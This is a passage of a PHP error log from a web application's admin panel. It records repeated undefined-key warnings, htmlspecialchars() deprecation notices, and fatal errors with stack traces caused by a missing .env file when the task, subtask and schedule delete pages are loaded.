26 [11-Apr-2025 14:15:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 15:06:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:06:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 15:31:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:31:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:33:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 15:33:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:33:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:34:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [11-Apr-2025 15:34:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 15:35:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [11-Apr-2025 15:35:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 15:44:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 15:53:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:02:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:02:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:04:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 16:04:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:05:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:05:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 16:05:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Aug-2025 11:24:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:25:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:25:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [26-Aug-2025 11:25:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [26-Aug-2025 11:26:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:34:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 12:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:01:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:01:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:02:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:02:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:07:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:07:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:09:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:19:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:20:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Aug-2025 13:14:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Aug-2025 14:59:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Aug-2025 15:00:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Sep-2025 12:45:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Sep-2025 12:45:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Sep-2025 12:45:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Sep-2025 13:25:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Sep-2025 13:25:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Sep-2025 13:28:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Sep-2025 10:43:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Sep-2025 10:43:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Sep-2025 10:43:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 10:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 10:41:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 10:41:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 10:57:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 10:57:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:01:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:03:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 11:03:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:05:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:45:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 11:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:56:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [12-Sep-2025 11:56:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [12-Sep-2025 12:08:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:34:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:34:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Sep-2025 13:34:15 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Sep-2025 13:42:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 13:42:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewservice.php on line 149 [13-Sep-2025 13:42:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewservice.php on line 155 [13-Sep-2025 13:43:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 18:24:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Sep-2025 18:24:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Sep-2025 18:24:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Sep-2025 18:32:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [13-Sep-2025 18:32:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Oct-2025 20:24:10 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:53:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:54:00 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 07:54:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 08:54:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in 